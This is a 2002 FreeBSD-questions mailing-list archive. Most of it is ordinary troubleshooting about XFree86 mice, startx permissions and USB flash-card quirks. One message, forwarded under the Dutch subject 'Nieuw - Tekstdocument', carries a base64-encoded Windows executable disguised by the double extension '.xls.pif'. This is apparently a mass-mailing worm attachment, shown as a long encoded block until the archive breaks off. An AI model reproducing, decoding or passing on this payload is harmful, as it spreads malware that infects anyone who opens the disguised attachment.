nouse to "Auto", "Busmouse", > & > > "Mousesystems". Still nothing works. Can anyone > help > > me? What am I doing wrong. > > > > Thanks again in advance, > > Ron Clark > > try setting the device to "/dev/sysmouse" and the > protocol to "SysMouse" > - this config works for me with 4.6R and a MS > optical mouse. > __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 6:52:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web10007.mail.yahoo.com (web10007.mail.yahoo.com [216.136.130.43]) by hub.freebsd.org (Postfix) with SMTP id EF9E137B400 for ; Sun, 23 Jun 2002 06:52:11 -0700 (PDT) Message-ID: <20020623135211.67341.qmail@web10007.mail.yahoo.com> Received: from [24.206.136.245] by web10007.mail.yahoo.com via HTTP; Sun, 23 Jun 2002 06:52:11 PDT Date: Sun, 23 Jun 2002 06:52:11 -0700 (PDT) From: Ronnie Clark Reply-To: Ronj_clark@yahoo.com Subject: FBSD 4.6, XFree86 4.2.0, and permissions? To: FreeBSD Questions MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Good Sunday Morning! I have finally got some kinks worked out. I now have my mouse working, so the new X is great. I created myself a regular user account with the ability to su to root. I log out as root, then log in as myself. I try to startx, and I get an error message saying that I cannot and do not have permission to open /var/log/XFree86.0.log. Has anyone else seen this? How does one fix this silliness? Thanks again in advance for the help. RC __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 6:56: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.thundernet.cz (mail.thundernet.cz [62.77.87.114]) by hub.freebsd.org (Postfix) with SMTP id 1A18537B401 for ; Sun, 23 Jun 2002 06:54:59 -0700 (PDT) Received: (qmail 8570 invoked from network); 23 Jun 2002 13:53:15 -0000 Received: from unknown (HELO freepuppy.bellavista.cz) (62.168.44.50) by mail.thundernet.cz with SMTP; 23 Jun 2002 13:53:15 -0000 Received: (from roman@localhost) by freepuppy.bellavista.cz (8.11.6/8.11.6) id g5NDx7R98341; Sun, 23 Jun 2002 15:59:07 +0200 (CEST) (envelope-from neuhauser@bellavista.cz) X-Authentication-Warning: freepuppy.bellavista.cz: roman set sender to neuhauser@bellavista.cz using -f Date: Sun, 23 Jun 2002 15:59:07 +0200 From: Roman Neuhauser To: Ronnie Clark Cc: FreeBSD Questions Subject: Re: FBSD 4.6, XFree86 4.2.0, and permissions? Message-ID: <20020623135907.GD10684@freepuppy.bellavista.cz> Mail-Followup-To: Ronnie Clark , FreeBSD Questions References: <20020623135211.67341.qmail@web10007.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020623135211.67341.qmail@web10007.mail.yahoo.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Date: Sun, 23 Jun 2002 06:52:11 -0700 (PDT) > From: Ronnie Clark > Subject: FBSD 4.6, XFree86 4.2.0, and permissions? > To: FreeBSD Questions > > Good Sunday Morning! > > I have finally got some kinks worked out. I now have > my mouse working, so the new X is great. I created > myself a regular user account with the ability to su > to root. I log out as root, then log in as myself. I > try to startx, and I get an error message saying that > I cannot and do not have permission to open > /var/log/XFree86.0.log. Has anyone else seen this? How > does one fix this silliness? Do you have Xwrapper installed? (/usr/ports/x11/wrapper) -- FreeBSD 4.5-STABLE 3:58PM up 20 days, 5:46, 12 users, load averages: 0.00, 0.01, 0.00 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 6:56:48 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id 0A4DC37B414 for ; Sun, 23 Jun 2002 06:55:27 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5NDtGjh069832; Sun, 23 Jun 2002 08:55:17 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: FBSD 4.6, XFree86 4.2.0, and permissions? From: Larry Rosenman To: Ronj_clark@yahoo.com Cc: FreeBSD Questions In-Reply-To: <20020623135211.67341.qmail@web10007.mail.yahoo.com> References: <20020623135211.67341.qmail@web10007.mail.yahoo.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 23 Jun 2002 08:55:16 -0500 Message-Id: <1024840517.69414.6.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 2002-06-23 at 08:52, Ronnie Clark wrote: > Good Sunday Morning! > > I have finally got some kinks worked out. I now have > my mouse working, so the new X is great. I created > myself a regular user account with the ability to su > to root. I log out as root, then log in as myself. I > try to startx, and I get an error message saying that > I cannot and do not have permission to open > /var/log/XFree86.0.log. Has anyone else seen this? How > does one fix this silliness? > > Thanks again in advance for the help. cd /usr/ports/x11/wrapper make make install > > RC > > __________________________________________________ > Do You Yahoo!? > Yahoo! - Official partner of 2002 FIFA World Cup > http://fifaworldcup.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 7:23:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from blount.mail.mindspring.net (blount.mail.mindspring.net [207.69.200.226]) by hub.freebsd.org (Postfix) with ESMTP id 32F9137B400 for ; Sun, 23 Jun 2002 07:23:45 -0700 (PDT) Received: from 2cust166.tnt1.columbus.oh.da.uu.net ([67.217.172.166] helo=ix.netcom.com) by blount.mail.mindspring.net with esmtp (Exim 3.33 #1) id 17M8HE-0000lK-00; Sun, 23 Jun 2002 10:23:40 -0400 Message-ID: <3D15DA02.BD15A0C1@ix.netcom.com> Date: Sun, 23 Jun 2002 10:24:02 -0400 From: Richard Scranton Reply-To: scrantr@ix.netcom.com Organization: Online Computer Library Center, Inc. X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.1-RELEASE i386) X-Accept-Language: en-US, en MIME-Version: 1.0 To: freebsd-questions@freebsd.org Subject: Imation FlashGO! works with quirks entries Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I was able to get the Imation FlashGO! USB flash memory gadget to work reliably with FreeBSD v4.1 by adding quirks entries for each of the card types. The FlashGO! comes as a USB adaptor for Compact Flash memory cards, and 3 different sleeves that allow it to accomodate Memory Stick, SD/MMC, and Smart Media cards. Only the SD/MMC option worked without the quirks entries in cam/scsi/scsi_da.c, and I don't have a Smart Media card to test, but Compact Flash and Memory Stick will work with the following change. Each type of memory card appears as a different device. The system I am using is a Sony VAIO Z505JS, FreeBSD 4.1-R, and some suspend/resume fixes. The part number on the USB adaptor is IMN-USG-FG1. I wanted to get this into the mailing list, as current wisdom seems to be that only the SanDisk ImageMate is useable. vaio [/x/home/richard]: cd /usr/src/sys/cam/scsi vaio [/usr/src/sys/cam/scsi]: rcsdiff -r1.1 -r1.2 scsi_da.c =================================================================== RCS file: RCS/scsi_da.c,v retrieving revision 1.1 retrieving revision 1.2 diff -r1.1 -r1.2 200a201,208 > }, > { > {T_DIRECT, SIP_MEDIA_REMOVABLE, "OEI-USB", "CompactFlash", "*"}, > /*quirks*/ DA_Q_NO_6_BYTE|DA_Q_NO_SYNC_CACHE > }, > { > {T_DIRECT, SIP_MEDIA_REMOVABLE, "OEI-USB", "Memory Stick", "*"}, > /*quirks*/ DA_Q_NO_6_BYTE|DA_Q_NO_SYNC_CACHE -- ______________________________________________ Reach high, for stars lie hidden in your soul. Dream deep, for every dream precedes the goal. http://www.netcom.com/~scrantr/index.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 7:25:17 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.FreeBSD.ORG (213-84-86-16.adsl.xs4all.nl [213.84.86.16]) by hub.freebsd.org (Postfix) with SMTP id 8939237B401 for ; Sun, 23 Jun 2002 07:24:47 -0700 (PDT) From: henk118 To: freebsd-questions@FreeBSD.ORG Subject: Fw: Nieuw - Tekstdocument Date: Sun,23 Jun 2002 16:23:56 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=cxpccee Message-Id: <20020623142447.8939237B401@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --cxpccee Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 213.73.172.98
.
.
Check the attachment
--cxpccee Content-Type: application/octet-stream; name=Nieuw - Tekstdocument.xls.pif Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Nieuw - Tekstdocument.xls.pif" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAABXZioCEwdEURMHRFETB0RRkBtKUR4HRFH7GE5RCQdEURMHRFEQB0RRcRhX UR4HRFETB0VRkAdEUfsYT1EWB0RRqwFCURIHRFFSaWNoEwdEUQAAAAAAAAAAUEUAAEwBAwC+0QI9 AAAAAAAAAADgAA8BCwEGAABgAAAAEAAAAOAAAABLAQAA8AAAAFABAAAAQAAAEAAAAAIAAAQAAAAA AAAABAAAAAAAAAAAYAEAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AAAYVwEApAEAAABQAQAYBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAuLi4wAAAAAADgAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgLi4uMQAAAAAA YAAAAPAAAABeAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAABQAQAACgAAAGIAAAAA AAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAkLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLiAkCgAuLi4hDAkCCVblYQe3/adfWykBAPdaAAAAAAEAJgMAm337 //+LRCQEi8iKEITSdA2A8r2IEYpRAUEMdfPDkP///48AVleLfCQMvvzQQACLBlBX6AMAVvyDxAiF wHUT8l/+/4PGBIH+sNFAAHzlX7gBAF7DXzPAXsOQt7fdB4HsIBpTVUdowNMq/xW7u//d5KBJ2IXb iVwkGA+EQhyLNegTaLDft993HlP/1micB4v4CYvoaIQLiW227e1sJCgNhf+JqhQxCYXta3fLswcB wPl4aNAHBJo127+9V4eL8JwEhfaJdCQcGuWNpvseuzQQUB9W/9cvwBSL++9d+zPtwegCEFQQD46r FN6LC1FqS9q3p3v/Dx+m7PBJdHSNVH72trXvRSRSagRQQwwwNHRfiwe7+Xb/JI1MJCxoBIZRUhck R418E7e7X3iDyf8G8q730Uk2LFFQTKihYXMjLL9CD00SUkZhs20vdAlyVm7wg8dP371uZP/YEfiA nEWDwwQ7vq5h++gPjF//AIszi9pW63w8/Gbr6VNbEF9eXVuBxGjDhe/WLG8oVVRqAmTYRD/3ZOGD /f8KggTHAyBQVYa30H0d0n9kax196Alpxr499L6nDjRadwi7F4wYUB/XEQUMuobL2NvTBcoQEGAQ dusYeVHMJ66dW1XPnDDOdl2kKB9kAwvurYudDIK8JIAOsD/tuobuAA8Aa9z/aDGAVizU4XPPzgwH MMwH0A0ogO7cz8ItCIQkeDyFFI2UrWvd1yaEiwtSR6hRI1zYNJgEuxgQUjgAoPDPUIiqOoPDiy0A lnXf20uNhDpFIDTVLK5waxYUByBShBgYTT7bkGcrNAIk/B0U4bHQ4RiG/ieFVsqywdxh0/VF1EHV NCdD9okPwZREjA35LI9Qi0RRUlDm3uywV8fNIJKOp7PwYY/np4P4AvKtY4PsPawhsKqELnUNjlVe NWAdUqkNQTUE6VjVyyCXfPu5d5yYINaD6AXGtEVRVyexdzaYNldjvz03hdO9p1YEuA4yBAswCbEM cSt0TL2MALKMUR8QAe3t1Y14CG4MR7hoWNQt13U0TQICDGFk4hgity7sQhwjaEwaSVwAoWzL3TUw FmjEDtZgIAvf/SmWr0ufmbkJlPf5ixSVnJMO4XDMQALWWBBdQ8t1jYAiBIwBbDCFIFu7aA2AUNBg Qx3MtrkjJx1TEkyzPVuXO4UQYywnnPjCJr11xnzxdRJTEWC3nu1YAQRXKqDo5XUGR/en21fpnQZk ejPJM/bQQxB99/e3B3Yqi9WB6sSB+Sk9cxqKhAr3f2/3DotdiIEJKEE7yHLeVcYPL7+Vj2OY6+t0 v/AFsCA7e/vvbyoUc1SKlC4OgPo6fAUEQH4KCbNvf3N6fTB/FDrQdCAIDXUmRlHIdsn3R0HrHQ8L DQqRwsKePQJGR4t8pnHiEBZeIYfuUVNUwQ7zkN+wl6wAWXKdgiYOZ05ccQ7hEF57A8NGBNf40Ax+ OdNScAmOhXp2M3FXZGEGg23wCW1XB+RADrBWF1ZNyc5hpVcrF7yfMyedAKlYsBJo3mVPjqxLmKGk AlhrZ2bApEAUV5A9sJkcZ1Sv0R1s1GymM6qBaAVkJTDMA66F/d6Vmg22/XPECYXSfjWJOBQU+uaN He5rFooXiP8XjVSJh2ALHVBO/Ugxeq1J+HXPVYYc4t+Z3WXr1lYCV7kQw75outmDNet45vOlpOkT MM6RkMrtksCTkaUTdyQR31aJyQnLi+hVoFZ+POHrxKgRVY9Q/yG85ewZIJ6HflcagVxgoBZGmtDF U3Qkgk7ttwycJfnnIXmKBFgT//8WRsHgCDv1fQsz24ocFgPDbhQStf+3A4vQFPoSg+I/ilQUeIgX Drv5HrINDFcBDgaD4D83K/DdXxOKRAQXAohHA34DBP0mfn89jUUBO/AKAj3xQYP5E3U1a2fhcNsQ G8bbyEPTme4KB4HxSFDnWmuYcDRQU9yZKMBe9gubLRVBhclrxkSMKABFHBjABjWLrww9zWALVDVS ZwdDpC7cUJk2aQZLOJBRlPpELGTpWxJQU1D1Bo8Or09+/3QEEnAG3qsKxwV8RhrPdqYT+rhMG6rM 7EnICe9DBV5XM/+4z4k9L8Bg5BKp/KEQLFwyt3NMG59oG94AohvflP0793UjvQxXTQLeQv9zrCTY g/v/dQ2wxafvnm7NImPk33AIHzvHdQ/xH+TSahl8DKLrBA+/QAhmx/Hv2MCY1GaFHotWDGoQiwKb oQs9R1IsCIn2ohDHLmSRoljQYAt3f3IPplh2FCXNCkyhgNf1ZnLZ0m90D4vtIO16UHgj1xA7xSkQ w6kWSP0FInhs4G6m7Dn0Hg6l2CjknuG1V8S7GO3aP+Z0SDmsgIl1P5wzGxbchBss18OKHw6EZrvm UkQa4N+Z3het6V4sJCbGAk72EbZO1yykh3UOg7ywvlfeIlSFOwFy+1VpvtjDFnVLUm1QjEGY4y18 jnlmI+G64nDBgFCIvs4d62t2D2i8O194ILRoJLPtC1HHLXQn1Tci32s+fBlhUlak323P5lgtqh+c 39V2KLvYOdKjJt9AXBM2HbXh7zR8JQzrUKlkGxZLMGdn65EqPGSwc/QUDTjNY+7szK5wfEJWdxTT dLYZwGNsWrivCmfkYN+kUZ+6oS1CPS4QeC0Yosdpe/XbTEi0nFcdnWNG1VMjtFxwagVLyBlyUbxs hvnIJTOjeH5mZffSpAF8aoKOH1rGdnHotUwhcg6w1SXIF/6PpHkFSIPI/kAB/v7//+h25VFk3k8N Xaj4h4Bh5rlw6MFQcGyYmd78H+stUwwJM/7AAXUjRytMhjQYlh8usCZIKBQCLSWUSyZ7M29mlUDd 2CUNksQUZGqQjAcyYSNRZpRSPF0sIV9euDgFWQjh8V4qB+HAoTjpBQ85yDfND5ZoaDDeQIAI8OtG oMjgIBRqSgkEvd6bPOmQIDNYZV25NZloLNFAC5Q7nDwX8lJoFGyETIvBprlQUVQQ3l3zuVOyp7AI hnlRNCMD9hVRIATWilxoxoWLEuZ1LMjDvmbAkyE24N/JAHZgGVcAnr0ZLw5O0g743Www18WlWGxj JFAgWBu/ty8gg/+SaIzIQx42MHvs3XAb5CGbE2zf62Lc3Y/sLDYvJFKc6zJ2tmRz6mOUUXCgC2SH RLcdsYNkTQZ814xYqXNYm3DPdicZS3Jo6ViEIJKCTSBQIJEPjJWxy6xYDMnIL2ZOY0zdAEt2lb1o 0DyYxQl52RkYLPzcvOQF2eTcpLMLyNwP4RKSRTAnsNywF8ghmIzcr2ySiJx43ElAMpMDe8CfuWgx iwwCaQYbMD5gfgwswrcW7qIiIQ9hXxCE2+PkZEyIDkjbjP2zJCMRmlG8pJk5kFDaZpPCygXTFR1Z AZiQXhYZ5O6E2gAs2QTyJh94IA5ADghmVAVM2nMhh+wtbFzLRDx7KbAt+5r0HiQXMoE8NJBXUqyu lyTaUNIB5G4U2tY8jK7feCDrEQoPO8zZyAnhhETZKwjZ2aEETpTYF4TXIM3oJkNIgRIgK+yBlyTr FQ8S/BsJvMiQ1jtaO3KBbAwDioSHFWAXfEpArEAOWA5k1lmrsk5/pjGGPiV0I2CLDIW0TWGDdAlj JMsPrzkIBs5Uoic41kJ2kwkskjIdIGGKVK+wOZoc9sIdMwJ0KzUk4i3jkNMTbxuyIDBIOVukZZML ORwQ+EJOctgorwCYIA/jskST1etfp8jV7CXkITIds9DkwkK2tNCMnunMt2DASLSBMMQAjEVPPMzR Mw2EUv1RsNU4kM7gDbwjV4zAbED8mMFeV+QAEodArITVAfmSLfkoVxIOsJB0eagWMiHwaNXzwMIi CB3G37FdyCUxT3xMKbYyknf2EYIihL0rRIwgWMhV9kuDPEIOWJziAPzcJCYTcuTcyJ4nEnIKENWF lAo5YP741K6k2ZA0PLz8BCxpZUwT1sgBgyTM4/TUdoCQHA2ILQcIyRQDy/IQUknvStzUEQKnUMVd zY2keMgI5RJq5JBBk2AF3AiEK040hHbUsCJlD34sxKxoBHzUMIqVXVaAFDQNrHhaHxjxUpRTBDAH ait1DykO7FFXzFdmFIv4YcGRPddWzFKLNaSn45wwPIQgZbgggQGT0BmSZg8w3+sGUVIumawRvkm8 DBGLkELxBECCydMwvLwDkCDSkPO0A7mSATmEUIzCUtgbtFrlWrOZzo0eDxwFIDXBECm9qaQLpHhZ cVFWajLJWfspLKLY6RcJ2drJJJNM29zdZDB3M97GBd8FLtCRSSaZ0dLTVANwkNQnjJtQRiRYclvg L13TdJjuyHhqD7F0xnA+1U33/wiUXlnDH6wFV1gRoThCLSFHqjwAAUICR/JIKiAEBJSyeciuBcnY 6agF0OkOOesFdEbcA/xDviZ8uNGpdzIjdsSThJTGLgzgCBu5si8Q63JFDFEYEV8OOQf4FIUIybvs IJOGBZDIFBNzgTxPDowMyADwT/XxGGjs/oT4M/+JPeTMEu2frSZMOT0U6wr4Bg7/x85P9xGNBJKN DICNFE3oC2KBvsE5oRlI0xin41vuK4zBArseU6YkIZRgdhWEkK6JcmQLGZoeNhdNwAQrGAX+HeWg 2AEoXje9/ZEv3EzB3oNTi1UAQFBSYAmnA5LmB91edMAejbSLRLlPdzdM1ExSAnA8BXb8U1JOYFPC 86X8UBEKbPvd55aFUDT6jRuDxQSB/cyNCmvRgh9sv29CWyzZa7ZvUzzADJBNUHoSDEEJeIFAHvb8 R6jcfen+2PgrfXaNLIVMDCusBfqNMN0gh8r8kAD4aHwyBBGAlcoxvSjsDr9+db1/dBQPu4bg/RJA hDvBA3yxweGskBczB/INw7fu7bwdwzJJHBgiD45E/aB7ix6mBNdoD48gEeMrSICqe8KFfx4IQc9A BTP2V4mTHFiPNYWDLdb2SA6MAdrVmAMemku6EoMo1TwCuZJL1UOQIawX84BvwmpVgtR9BcCwEHt4 LDb69avwEEmFyXenu3xkU2QUDIJp6i4IytgGhsEvBCg1FMxC48EljUOcKB5YoQHyMCxSUEI+OxdG HC6EQIHDWSofL+EDEKR5wxwknhBQQAUBcEKIDQz/FAItZQhmj5BPEQvEAR6uHy4cu4HYIg+A8PQQ QQQgl0s03CgBFOCUkaUgiCAcBM+BAOMEVMGBJyeDUvihsYYmAU/tV2eavzOAQph9FR2L2LgB3BqX tzvTCBSjy218+9HGpRNtfWyZfCMHbhJwewV9YRx9PqDCz2J0hRsnTdX9QkJGf/tYA/SJCo0ciYpi E4D5O4iMW9bt3l7nXlZ1vh9AXA0Bt/Z9icaETh0Ae1x8mhfCYWCMLT9EPCN4MDtWuljg4BQMAq8Q ygWHxqxGP80QritiN6NTDkDsuizKBFVXUyDIeHxUjiAQ9OW/TZxOgYPI/e5kgYgQAyucNxbw8DBS aQyhLHkZH7iudeh7JFSuDMCd0QRnjDJpWFO52RJPzFCeEKcCMlEhyZ0FMAEekHbLD/7Mc0jg0xSN R5zDY20We5bpFV0qNHSugXh6KmQTMozAGt6L3BDh1mLbYQm5IC9Sa2QCH5t4ahOBx9dCkB8suMMD JBBH2hPKgSwc6V9diQpbXqJENx4ZpM55D77CMmJ/fHoHsBUUfusyD8gAVpvNnb9ikuAz2yz5fnSL XqTprIygBYhVd7e5izWEPbcldQNTn6wi3Juv4THcVYkdsC6G4sZLjhZq/NTgNr0RipvgFcihPawt XnvbgCcoVtAab0D7ERzbRrwFuOnlo8AHgyHbHaPEBmioOTwkvoWmYQNOpFV8BT4CF2MnHX7MjBhR udtXKMz7q1NVHczZwLU16w9sTL7gTj4egZiQMCS35D68scxwPYowLAPTdF1XMPc0BzgDPEA128hd RCNIpOBMV7yhvZcO4ITsxHUmobdXa/xrssRTVlNTuwMQeh//2pAFNmoI/9f3g/nGfqUlWjW+L6G8 NLhz/NpPK9BVUhdBK9H8PuPE7ORAUz2j9e8d4aboUKPMsjCgQEu29r1nOaPIVhtRQh40F+vpRRNM KHocuW3Hsq2YAMxgU3knBZubJgopJLVqutY7uwVEwKE2f0UssxXACiCzQDKADQZ8KBgGnhJm+mf/ M8mK6olJFLmybyCKisrB4QgZRKfge3Yj0XILwrk8JXOwwsO4PMJ8gS1oAQY7sqYqVBBYT0axXcBO 8g6gTBoW6S5l+IP+D3wE7An6DxVQG+jY3BA9UCZML2ABdQvLHytgvAKI92YDZRxhCdgVaxDd8GNW UIaU4SdUahNokKaP/p+ZEdrAwlKZg+IHA8LB+AM8YQT4yiA+OGEYSMF0ll7c6c3z70uGB4M9grB1 L7gm12A9U0lTKQzMGb+NMXO0HC2s/IjZi3cIWQmDMBfyBA51297IAJCGprvug+xUglzjCDDh7hM+ z2JkdgwMGAkHFOifjQx32w+HsQY2g/gg07bw0ndOk4vISTxJuxBEA9wWDNgM+yUwMN0EpYRFVMIQ ziW/Zcer1KESItyht3+htkuByy7/dAmD6QRSvQJrJcshAajEcxVbxXxkJ0Wic/GjvXG7+hquaGxi YBSK4DRRVTALUkN513QUwC3pPZZVFD0VbCGLleUqPypTOv0P7lyvaHWgTUN4lDGk6cBKSuxMzDnp pFgMTqFAUCshUwg65BQISe9shBjQT7Kwn5Buu4r6MYraweMIEekxu5Q/C9qFTD8jOZILKDDkQiaS NCgokaaZ5CwsKDwFz9edPA1CBEFHiCGpbGJARVVngKQzJ1VHaA7jYZZo1e0njXiL35USEYP5B3dt /2zoQEB8HNzDVnVVpJuVocQv4Hqgj3jIeQL32eueBRw3iKzCD9g+NjLeeAp/HvQKfiGGTJq6kR0I GExkz2CzlXAGhU3iZ9gnt90zG5Blhg4+A8tAsrmE3rJACxd/lDDqeMEogFfBKSOzlPeYxBmQT0e/ oMzhDOLB7JBXNAtRkK8sppQkrEbDIoLFqsHQs6F4uSKhROEQFVulTCPLoUhEF4+Kzs8oPYAczEzd DbXUQCNlJx0UjVCyYJN9SlAWUTMt6WhYRYeLlEHNCSEPGFYjVpJzN4lDzpnk7BAFCfX24uduJvfG BfgFEDEMGH1Ssaz/8A9BO1oRo4UD4uZes4ohG2YYAQjCudB7z9XeHAGQC2v4ziDTAlkcT4C+Q3P7 CIxPECgYvc48BBqd2WLlxh3UIUBhFOidUAQ2iy1f91qPOTwqYRAWVHQ0CyoLFhgxng7onwMMFn8z uZNQig90ajxhfgo8ejANn/t9BgTgiBKvV5kE3S3Q91EnBAEUOQQgiLZDhvMMhMxrIxgPLl1gOJw9 AAwOdWfNjZGKJYQZgp5LrpoNlgxWpzEDxWH12HQIBwR1U/4IXGjACE5DJnvHiojd/10BOhZ1HITJ dBSKUAEMVgH00u2X4sACg8YCE3XgTusFG42iobhS2P+BV6YrvNmIALo0g8cDgD9flga7fYpHAUd7 dfgHiPtfXz1ZgM8DcASInGiHQ+wkeASZ6kqdPNkZvqZs5QccZCBckydPniRUKFAsSOGAx8kwQBR7 jugRtnrADuKtOIsxoBPRXcBoLAxSXI2HPLfcQAM0+IOqfTQ193RVaBwkK25EWBAwIMOBMjxVcxVM R5f3HIM4/iZmnF2IQAJx2T46RIYvUeMdVKONoiNOwvEHLCY2wsCHVVgTToV5Ev1wBIKZzXzHgWgM BGxopLBgzJpkEMRbFiNpWT6PPzaDR8MIAwxw6qLKPXSHH3L/XwBLHa8OeMPqEoXCHKy0LXKfoLMC rdFA+YZH9FT+8GZPR91I0VBW6OTcQAff2NSrqWZ2zxEkhF4Ivw1++nQLjUb87TWs63QGHItO2yAL wBBRFjRHKSBmFR38O/hy0uucHqhgDHP1xlTeylDHMHEyX0IIZt61dqBeOCh9K5kWmcmd2xXXWJwt DhVqLtS20SAOkF8ESCHBJRpgo/9eLys6wDkUBGM4sQwoD8jigcEEHh54ExeS7BERcFnaTQ42BvLA 1lIcKLYl8Hq8mdY8JGXBY+YVNBeZHnilaGVQ1lDOgJ5J8FZ929QOZgOMFLTlog1qVrVEUSgTuDHH iwWnNLLrfAo4A/QYoCQ+N2gTHFFDUjZsdTIZXKgOHiRE8q4NMahvgHT30VBJUoLuhhmBVv8cLmi4 zzugFHUQgd72dYTLimZQbeosZBJOsEt04QSQPEUTi+hDSkaYKv1BiDZSctLBFK8clHBCTghU42Oz SHLkZAIkAoRATiC8lBJnLAMphJk7KBU0Z0jxTMk4AuhVRq8jDHEoXCIcF3g1MhKICL7hJl10ZBOT MCRAtMGhI0I9GqCLcLoyQsH4NMDPuYQtDOOjVSEarzKEEdxRUgcGagvxUwBE2zYXLMFAOFI4bxjW HbxL1Gg5ajtQPnUQDShWzLQbhIGbgRj/a0UyYuEwfeP5cjJkLCRRMzA1NC+HDCQ4Vf/WJMaA4JYQ RFSa2XChITVDSFNRPjTICAYemM6FMdhjGIJFvf6IABoeETiT/6WPjAWHc3RFJqsW6IFwcFSSioV1 46Spse4Y+wD4qeRDdSYcj7gHR63JGBCfvynfl2A6jKSJKJyTDrNwEnQQAQRqh61Oz8AFUH4fxDwU XTBw9WyueGOE7p3VvBlKKBMU31WYYNk/jZNwm5tYmYe0LNMkNogGMglQJ6pD9Q2xw3g3uQE4kFGs BG3U/x1ARFIr+YvBi/eL+sHpAkU3qd8/yIPhA/OkRpNE57r/WLFEg+oDxgQQZPhEsBhQu22xFTJS FghhEdl+073QBEN0HXiAfAR3XHTNTLOIPFAYUe55cuwXwKzjBzCkNJw6TZ48OJQ8jC/Hd0OFfJks 